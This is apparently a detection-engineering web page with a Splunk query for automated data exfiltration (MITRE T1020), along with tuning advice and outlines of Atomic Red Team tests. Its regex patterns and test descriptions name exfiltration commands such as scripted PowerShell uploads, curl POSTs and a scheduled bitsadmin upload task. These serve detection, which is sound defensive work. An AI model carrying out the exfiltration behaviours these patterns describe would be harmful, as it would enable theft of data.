Detect Automated Exfiltration in Splunk
Adversaries may exfiltrate data through the use of automated processing after being gathered during collection. Automated exfiltration commonly involves scripted or programmatic transfer of collected files to attacker-controlled infrastructure on a schedule or triggered basis. This technique is frequently combined with T1041 (Exfiltration Over C2 Channel) or T1048 (Exfiltration Over Alternative Protocol) to move data out of the network. Real-world examples include StrongPity automatically uploading collected documents, Rover scanning local drives on a 60-minute cycle, Raccoon Stealer acting on received configuration files, and Ke3chang performing frequent scheduled exfiltration from compromised networks.
MITRE ATT&CK
- Tactic
- Exfiltration
- Technique
- T1020 Automated Exfiltration
- Canonical reference
- https://attack.mitre.org/techniques/T1020/
SPL Detection Query
// Branch 1: Scripting engines with collection + upload patterns (Sysmon Process Create)
index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
(Image="*\\powershell.exe" OR Image="*\\pwsh.exe" OR Image="*\\python.exe" OR Image="*\\python3.exe"
OR Image="*\\wscript.exe" OR Image="*\\cscript.exe" OR Image="*\\cmd.exe")
| eval cmdl=lower(CommandLine)
| eval HasUpload=if(match(cmdl,"(uploadfile|uploaddata|uploadstring|start-bitstransfer|net\.ftpwebrequest|invoke-webrequest.*put|invoke-restmethod.*put)"),1,0)
| eval HasCollection=if(match(cmdl,"(get-childitem|\bgci\b|dir\s+/s|get-content|\[io\.file\]::|compress-archive|-recurse)"),1,0)
| eval HasTransferTool=if(match(cmdl,"(curl\s|wget\s|ftp\s-|\bsftp\s)"),1,0)
| eval SensitivePath=if(match(cmdl,"(\\\\documents\\\\|\\\\desktop\\\\|\\\\downloads\\\\|\\\\appdata\\\\|\\\\programdata\\\\|\\\\temp\\\\)"),1,0)
| eval ExfilScore=HasUpload + HasCollection + HasTransferTool + SensitivePath
| where ExfilScore >= 2
| table _time, host, User, Image, CommandLine, ParentImage, ParentCommandLine, HasUpload, HasCollection, HasTransferTool, SensitivePath, ExfilScore
| eval Branch="scripting_engine"
| append [
search index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
(Image="*\\curl.exe" OR Image="*\\wget.exe" OR Image="*\\certutil.exe" OR Image="*\\bitsadmin.exe"
OR Image="*\\ftp.exe" OR Image="*\\sftp.exe" OR Image="*\\scp.exe")
| eval cmdl=lower(CommandLine)
| eval IsUpload=if(match(cmdl,"(-t\s|--upload-file|\-d\s@|--data-binary\s@|\bput\b|\bpost\b|/transfer|/upload|ftp://|sftp://|ftps://)"),1,0)
| eval IsExternal=if(match(CommandLine,"(ftp|sftp|ftps|http|https)://") AND NOT match(CommandLine,"(10\.|192\.168\.|172\.(1[6-9]|2[0-9]|3[0-1])\.|127\.)"),1,0)
| where IsUpload=1
| table _time, host, User, Image, CommandLine, ParentImage, ParentCommandLine, IsUpload, IsExternal
| eval Branch="transfer_tool"
]
| append [
search index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
(Image="*\\7z.exe" OR Image="*\\7za.exe" OR Image="*\\rar.exe" OR Image="*\\winrar.exe" OR Image="*\\tar.exe")
| eval cmdl=lower(CommandLine)
| eval HasSensitiveSrc=if(match(cmdl,"(\\\\documents|\\\\desktop|\\\\users|\\\\programdata|\\\\appdata)"),1,0)
| where HasSensitiveSrc=1
| eval ArchiveTime=_time
| eval ArchiveHost=host
| join type=inner host [
search index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=3
NOT (DestinationIp="10.*" OR DestinationIp="192.168.*" OR DestinationIp="172.16.*" OR DestinationIp="127.*")
| eval NetTime=_time
| table host, NetTime, DestinationIp, DestinationPort, Image
]
| where (NetTime - ArchiveTime) >= 0 AND (NetTime - ArchiveTime) <= 300
| table ArchiveTime, host, User, Image, CommandLine, DestinationIp, DestinationPort
| eval Branch="archive_then_network"
]
| sort - _timeThree-branch detection for automated exfiltration: Branch 1 scores scripting engine invocations on upload capability + collection behavior + sensitive path access (threshold score >= 2). Branch 2 detects dedicated transfer tools (curl, certutil, bitsadmin, ftp) with upload/PUT/POST flags targeting external destinations. Branch 3 correlates archive tool activity against sensitive source paths with subsequent outbound network connections within 5 minutes. All branches use Sysmon EventCode=1 (Process Create) and EventCode=3 (Network Connect).
Data Sources
Required Sourcetypes
False Positives & Tuning
- Backup software agents (Veeam, Acronis) that compress user directories and transfer archives to remote storage servers
- Cloud storage sync clients (OneDrive, Dropbox, Box) that continuously monitor and upload modified files from user profile paths
- Log shippers and monitoring agents (Splunk Universal Forwarder, Elastic Agent) running on schedule to collect and push log files
- Developer tooling (Git LFS, artifact upload scripts) pushing build outputs to external repositories or package registries
- Managed file transfer solutions (IBM Sterling, GoAnywhere) performing scheduled compliance-required data transfers
Other platforms for T1020
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1PowerShell Automated File Upload via Net.WebClient
Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'Get-ChildItem', '-Recurse', 'Net.WebClient', 'UploadFile'. Sysmon Event ID 3: Network Connection attempts to 127.0.0.1:8443. PowerShell ScriptBlock Log Event ID 4104 with full script including file collection loop.
- Test 2Scheduled Automated Exfiltration via BitsAdmin Upload
Expected signal: Windows Security Event ID 4698 (A scheduled task was created) with task name 'WindowsTelemetryCollect' and action 'bitsadmin /transfer exfil /upload'. Sysmon Event ID 1 for schtasks.exe process creation. Microsoft-Windows-TaskScheduler/Operational Event ID 106 (task registered). When task fires: Sysmon Event ID 1 for bitsadmin.exe with /upload flag in CommandLine.
- Test 3Python Script Recursive Collection and Staged Archive Upload
Expected signal: Sysmon Event ID 1: Process Create with Image=python.exe, CommandLine containing 'zipfile', 'os.walk', 'Documents', 'urllib.request', 'POST'. Sysmon Event ID 11: File Create for collect_df00tech.zip in %TEMP% directory. Sysmon Event ID 3: Network Connection attempt to 127.0.0.1:8080. DeviceFileEvents (MDE) will show the archive creation.
- Test 4Curl-Based Automated File Exfiltration Loop (Linux/macOS)
Expected signal: Linux auditd: execve syscall events for bash and curl with full argument arrays. Syslog: process execution records. If Sysmon for Linux deployed: Event ID 1 (Process Create) with CommandLine containing 'find', '-name', 'curl', '-X POST', '-F file=@'. Network: connection attempts from curl to 127.0.0.1:9090. File access events for each file POSTed.
References (10)
- https://attack.mitre.org/techniques/T1020/
- https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/
- https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
- https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
- https://www.welivesecurity.com/2019/05/07/turla-lightneuron-email-too-far/
- https://attack.mitre.org/software/S0409/
- https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-devicenetworkevents-table
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-devicefileevents-table
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md
Unlock Pro Content
Get the full detection package for T1020 including response playbook, investigation guide, and atomic red team tests.